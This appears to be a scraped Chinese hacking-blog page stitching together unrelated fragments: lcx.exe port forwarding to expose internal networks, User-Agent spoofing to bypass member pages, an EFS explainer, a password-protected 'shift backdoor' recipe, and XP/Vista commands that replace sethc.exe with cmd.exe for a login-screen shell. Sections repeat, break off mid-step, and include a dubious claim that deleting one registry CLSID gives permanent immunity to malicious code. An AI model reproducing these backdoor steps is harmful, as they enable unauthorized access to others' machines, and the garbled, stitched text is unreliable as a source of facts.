巧用端口映射 不通过网关开放任意内网
今天给大家说说如何巧用端口映射,不通过网关开放内网的方法。
一:使用前提
需要有一台公网的IP。假如现在我们有一台公网的IP :210.210.21.21
二:用到的工具
1.lcx.exe
2. vdic
今天给大家说说如何巧用端口映射,不通过网关开放内网的方法。
一:使用前提
需要有一台公网的IP。假如现在我们有一台公网的IP :210.210.21.21
二:用到的工具
1.lcx.exe
2. vdic
为什么有的网站能够被Google搜索到,点击链接进去以后却显示“未注册”、“还不是会员”呢?这是一种网站专门针对对搜索引擎优化的技术。
那么我们也可以伪装成搜索引擎来进入这些页面。我们需要的是修改浏览器的User-Agent值。下面以Internet Explorer为例说明:
把下列代码保存为 ua.reg,双击导入到注册表中:
EFS(Encrypting File System,加密文件系统)加密是一种基于NTFS磁盘技术的加密技术。EFS加密基于公钥策略。在使用EFS加密一个文件或文件夹时,系统首先会生成一个由伪随机数组成的FEK(File Encryption Key,文件加密钥匙),然后将利用FEK和数据扩展标准X算法创建加密后的文件,并把它存储到硬盘上,同时删除未加密的原始文件。接下来系统利用你的公钥加密FEK,并把加密后的FEK存储在同一个加密文件中。而在访问被加密的文件时,系统首先利用当前用户的私钥解密FEK,然后利用FEK解密出文件。在首次使用EFS时,如果用户还没有公钥/私钥对(统称为密钥),则会首先生成密钥,然后加密数据。如果你登录到了域环境中,密钥的生成依赖于域控制器,否则它就依赖于本地机器。
前段时间去一个流量过百万的站的服务器上参观,朋友加了一个shift后门并称该后门是很久以前他公布的,具体情况我也没多问,回来后自己也做了一个加密码的shift后门.利用winrar加密的.很简单,火力群里一个小弟弟问我怎么做的,叫我写个说明,那么我就简单介绍一下制作过程-Amxking
1.我们首先建立一个名为win.rar的压缩包,及一个批处理命令名为AK.bat的文件.
2.再把这个批处理文件AK.bat加到win.rar压缩包内加密.在高级选项里设置密码如:!@#$%^&
夜火:在cn_判官那看到的文章,让我们见识到了社会工程学(简称“社工”)不仅仅是破解密码有用,社会工程学真正应用起来是非常的恐怖的,就如下面的文章,看完之后会有点后背发凉的感觉。BTW:这是0712期黑客X档案里的文章,这期里也有我发的一篇文章,不过没什么技术含量就是~,纯粹是windows应用的小技巧,我要说的是:我12期的样刊还没拿到手!!!今天都1月3号了,我的样刊。。。。。。都该买第0801期了~,联系sagi竟然不甩我,汗~。好了,废话唠叨完了,看文章,虽然比较长,但是看完的话能学到不少东西,如果想见识更多社会工程学应用的话,建议看看本blog收集到的《欺骗的艺术》[完整中文版][DOC][PDF],凯文米特尼克写的哦
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:fhod
说明:文章已发表于黑客X档案2007年第12期,转载请注明出处!
Universal Viewer(ATViewer)是一款支持广泛的文件格式的文件浏览器.该软件集成于已经安装到你的计算机上的大多数现有的浏览器,并且允许你为任何未 知的文件类型使用一个十六进制,文本或者二进制格式进行浏览.Universal Viewer可预览大量文件格式,包括PDF文档、Office文档、图片、各种网页和编码、字体文件、Flash Video、音乐文件以及视频文件.
你可以通过获取插件的方式添加对额外文件格式的支持.Universal Viewer 支持制作者插件.
很多情况下好多朋友都被恶意代码烦透了吧,我在各个安全网站到处漫游,看能不能帮大家一把,终于让我找到了这个好文章,大家可以参详一下。不过我开拓进取在这里提醒一下大家,在修改注册表之前一定要备份喔~并且要看准键咯~~`删错了可就…… 一、 修改注册表: 我想大部份网友都有过被恶意代码修改过注册表的经历吧,有一招简单的方法是可以永远免疫的, 就是在注册表中删除恶意代码会用到的一个id就可以了, 那就是F935DC22-1CF0-11D0-ADB9-00C04FD58A0B,只要把它删了,那你以后碰到恶意代码,就再也不用担心注册表会再被修改了,它在注册表里面的路径是HKEY_CLASSES_ROOTCLSID{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B} 找到后把整个项删掉就可以了,这个项删掉不会对系统有任何影响,请放心删除。(请注意不要删错了哦)
这篇文章里说的方法和欠钱前2天说的用explorer.exe替换sethc.exe然后在3389下用5次shift获得资源管理器的方法差不多,不过做了一些扩展,蛮有意思~
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。
XP:
将安装源光盘弹出(或将硬盘上的安装目录改名) cd %widnir%system32dllcache ren sethc.exe *.ex~ cd %widnir%system32 copy /y cmd.exe sethc.exe |
VISTA:
takeown /f c:windowssystem32sethc.exe cacls c:windowssystem32sethc.exe /G administrator:F 然后按XP方法替换文件 |
虽然我们 Download.com 已经有很多台电脑出于测试或者别的目的安装了Windows Vista,但是我的工作站一直还停留在XP系统上。也许是我习惯了Windows XP的操作,懒得重新安装各种软件,或者是为了避免软件不兼容带来的各种麻烦。我并不是说Vista 在软件兼容性上有什么问题,日后我也会转向Vista,但是现在还不是时候。 虽然目前我对XP相当满意,而且它也是软件种类最丰富的平台,但是我仍然经常在CNET Downloads上寻找一些系统优化工具,可以让我的XP跑得更快。 我所选择的软件包括整理现有软件,清理系统垃圾文件,以及优化系统设置和运行速度等方面的软件。 目前网上针对XP系统性能优化的软件相当多,下面我就说说我常用的系统优化软件,而且这些软件都是免费的。